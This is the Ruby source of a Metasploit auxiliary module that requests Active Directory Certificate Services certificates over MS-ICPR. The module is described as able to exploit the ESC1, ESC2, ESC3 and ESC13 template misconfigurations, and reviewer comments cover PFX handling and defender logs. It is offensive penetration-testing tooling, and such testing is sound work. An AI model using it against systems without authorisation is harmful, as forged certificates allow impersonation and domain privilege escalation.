GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/dcerpc/icpr_cert.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'ruby_smb/dcerpc/client'
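# Auxiliary module that requests a certificate from Active Directory
# Certificate Services over MS-ICPR.
#
# This file only declares the module metadata and wires the single
# REQUEST_CERT action to #request_certificate. That helper and the
# MsIcpr*Error classes rescued in #run are not defined here; presumably they
# come from Msf::Exploit::Remote::MsIcpr -- confirm against the mixin.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::MsIcpr
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::DCERPC
  include Msf::Auxiliary::Report
  include Msf::OptionalSession::SMB

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values declared below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ICPR Certificate Management',
        # NOTE(review): per the description, saved PFX files use a blank
        # password. A PFX (PKCS#12) bundle normally carries the private key
        # as well, so anyone who can read the stored file can use the
        # certificate; treat the saved files as credentials and purge them
        # when the engagement ends.
        #
        # ESC1/ESC2/ESC3/ESC13 name classes of certificate template
        # misconfiguration; the remediation is on the CA/template side
        # (enrollment rights and template settings), not in this module.
        'Description' => %q{
          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
          template's configuration the resulting certificate can be used for various operations such as authentication.
          PFX certificate files that are saved are encrypted with a blank password.

          This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Will Schroeder', # original idea/research
          'Lee Christensen', # original idea/research
          'Oliver Lyak', # certipy implementation
          'Spencer McIntyre'
        ],
        'References' => [
          [ 'URL', 'https://github.com/GhostPack/Certify' ],
          [ 'URL', 'https://github.com/ly4k/Certipy' ]
        ],
        'Notes' => {
          'Reliability' => [],
          'Stability' => [],
          # IOC_IN_LOGS: a run leaves evidence in logs. For defenders, the
          # issuing CA is the place to look -- its request/issuance records,
          # and on Windows CAs with auditing enabled typically event IDs
          # 4886/4887 (confirm against the environment's audit policy).
          'SideEffects' => [ IOC_IN_LOGS ],
          # Spelled to match the GhostPack/Certify reference above (the
          # previous value, 'Certifry', was a typo).
          'AKA' => [ 'Certify', 'Certipy' ]
        },
        'Actions' => [
          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
        ],
        'DefaultAction' => 'REQUEST_CERT'
      )
    )
  end

  # Runs the selected action and translates MS-ICPR errors into framework
  # failure reasons via fail_with.
  #
  # @return [void]
  def run
    # Dynamic dispatch on the action name. The only action declared in
    # #initialize is REQUEST_CERT, i.e. #action_request_cert; this relies on
    # the framework restricting the selected action to the declared list --
    # confirm before adding actions whose names are not fixed strings.
    send("action_#{action.name.downcase}")
  rescue MsIcprConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue MsIcprAuthenticationError => e
    fail_with(Failure::NoAccess, e.message)
  rescue MsIcprNotFoundError => e
    fail_with(Failure::NotFound, e.message)
  rescue MsIcprUnexpectedReplyError => e
    fail_with(Failure::UnexpectedReply, e.message)
  rescue MsIcprUnknownError => e
    fail_with(Failure::Unknown, e.message)
  end

  # REQUEST_CERT action: hands the (possibly empty) connection options to
  # #request_certificate, which is defined outside this file.
  #
  # @return [void]
  def action_request_cert
    with_ipc_tree do |opts|
      request_certificate(opts)
    end
  end

  # Yields connection options to the block and disconnects the IPC$ tree
  # afterwards if one was opened here.
  #
  # @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.
  # @return [void]
  def with_ipc_tree
    opts = {}
    if session
      print_status("Using existing session #{session.sid}")
      client = session.client
      # Reuse the session's already-connected socket instead of opening a
      # new connection.
      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
      opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")
    end

    yield opts
  ensure
    # Runs on both success and failure so the tree connect is not left open
    # on the reused session.
    opts[:tree].disconnect! if opts[:tree]
  end
end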